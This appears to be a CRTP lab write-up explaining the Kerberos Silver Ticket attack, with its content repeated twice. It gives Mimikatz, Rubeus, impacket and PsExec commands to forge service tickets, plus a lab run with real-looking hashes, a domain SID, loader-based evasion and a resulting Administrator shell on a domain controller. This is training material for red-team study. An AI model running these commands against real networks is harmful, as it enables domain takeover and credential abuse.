Silver Ticket

Unlike Golden Ticket where we forge TGT using krbtgt hash, Silver Ticket attack forges a TGS for a specific service without needing to pwn KDC or krbtgt. We only need the NTLM hash of service account.

Silver Ticket

In Silver Ticket attack, we forge the TGS to gain access to a service, without needing to compromise a domain controller.

We first compromise a service account by obtaining NTLM hash or Kerberos key.
Forge the TGS using Mimikatz
Use the forged TGS to authenticate to the specific service as the compromised account.
Unlike Golden Ticket that uses TGT, Silver Ticket attacks do not require any interaction with DC, making it stealthier.
Note: Golden ticket provides access to any service on any machine, where as Silver Ticket only provides access to particular service on a particular machine. Golden Ticket could last 6 months where as Silver expires in 30 days.

Windows:

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Linux:

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>

export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 

python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Attack in Practice:

When we have the DC/DA hash, we can create a Silver Ticket that provides access to a service of DC. Once the ticket is imported, we can get a shell as DC.

# ArgSplit for "silver"
# Use the NTLM or AES hash of dcorp-dc to forge and import ticket:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# Similarly for WMI using BetterSafetyKatz.exe
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-
719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600
/renewmax:10080 /ptt" "exit"

# Similar command can be used for any other service on a machine. Which services? HOST, RPCSS, HTTP and many more

# Since the ticket is imported, we can get a shell as DC and execute commands.

C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

PreviousCRTP Lab 8 NextCRTP Lab 9

Last updated 4 months ago

Silver Ticket

In Silver Ticket attack, we forge the TGS to gain access to a service, without needing to compromise a domain controller.

We first compromise a service account by obtaining NTLM hash or Kerberos key.

Forge the TGS using Mimikatz

Use the forged TGS to authenticate to the specific service as the compromised account.

Unlike Golden Ticket that uses TGT, Silver Ticket attacks do not require any interaction with DC, making it stealthier.

Note: Golden ticket provides access to any service on any machine, where as Silver Ticket only provides access to particular service on a particular machine. Golden Ticket could last 6 months where as Silver expires in 30 days.

Windows:

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Linux:

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>

export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 

python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

Attack in Practice:

When we have the DC/DA hash, we can create a Silver Ticket that provides access to a service of DC. Once the ticket is imported, we can get a shell as DC.

# ArgSplit for "silver"
# Use the NTLM or AES hash of dcorp-dc to forge and import ticket:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# Similarly for WMI using BetterSafetyKatz.exe
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-
719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600
/renewmax:10080 /ptt" "exit"

# Similar command can be used for any other service on a machine. Which services? HOST, RPCSS, HTTP and many more

# Since the ticket is imported, we can get a shell as DC and execute commands.

C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC